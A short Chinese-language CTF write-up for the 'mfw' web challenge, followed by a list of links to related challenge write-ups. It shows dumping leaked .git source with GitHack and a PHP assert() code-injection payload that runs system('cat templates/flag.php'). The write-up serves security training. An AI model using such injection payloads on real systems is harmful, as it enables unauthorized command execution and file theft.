攻防世界web高手進階18(mfw)
攻防世界web高手進階18(mfw)
開啟題目先收集有用的資訊
是用了Git、PHP、Bootstrap,嘗試是否有git原始碼洩露
有git原始碼洩露漏洞,直接上工具扒。
工具下載命令(Linux)
git clone https://github.com/lijiejie/GitHack.git
直接檢視flag.php沒有資料資訊
檢視一下index.php
strpos()函式會匹配第一個引數與另一個引數匹配,如果一樣則為false,然後就會。。。。
所以用工具爬是個不錯的選擇
file_exists() 函式檢查檔案或目錄是否存在
assert()函式會將括號中的字元當成程式碼來執行
所以可以嘗試從assert()函式入手,構建pyload
') or system("cat templates/flag.php");//
帶入程式碼中為:
assert("file_exists('') or system("cat templates/flag.php");//')") or die("That file doesn't exist!");
其 中//起到的是註釋後面程式碼的作用
沒得回顯,檢視下原始碼
相關文章
- 攻防世界web高手進階之blgdelWeb
- 攻防世界 web高手進階區 10分題 urlWeb
- 攻防世界 Reverse高手進階區 2分題 Mysterious
- 攻防世界 Misc高手進階區 5分題 picture2
- 攻防世界 Misc高手進階區 5分題 側通道初探
- 攻防世界 Misc高手進階區 2分題 心儀的公司
- xctf-web(高手進階區)-supersqliWebSQL
- 攻防世界-web2Web
- 攻防世界web題ics-06Web
- xctf攻防世界—Web新手練習區 writeupWeb
- 攻防世界
- MISC——攻防世界
- 攻防世界Misc
- 攻防世界 easyphpPHP
- 【攻防世界】warmup
- 攻防世界-easychallenge
- Linux-高手進階之路Linux
- hackme 【攻防世界】Reverse
- 攻防世界-mfc逆向
- 攻防世界-你猜猜
- 攻防世界-easyupload
- Web前端攻防Web前端
- 攻防世界php2PHP
- 【攻防世界】ez_curl
- 【攻防世界】ezbypass-cat
- 【攻防世界】BadProgrammer
- 【攻防世界】catcat-new
- 【攻防世界】wife_wife
- 攻防世界-Easy_ECC
- 攻防世界-easy_RSA
- JVM菜鳥進階高手之路十四:分析篇JVM
- Web 開發進階指南Web
- Web之前端攻防Web前端
- 攻防世界-轉輪機加密加密
- 攻防世界-柵欄密碼密碼
- js高手進階之路:underscore原始碼經典(完)JS原始碼
- js高手進階之路:underscore原始碼經典(二)JS原始碼
- js高手進階之路:underscore原始碼經典(一)JS原始碼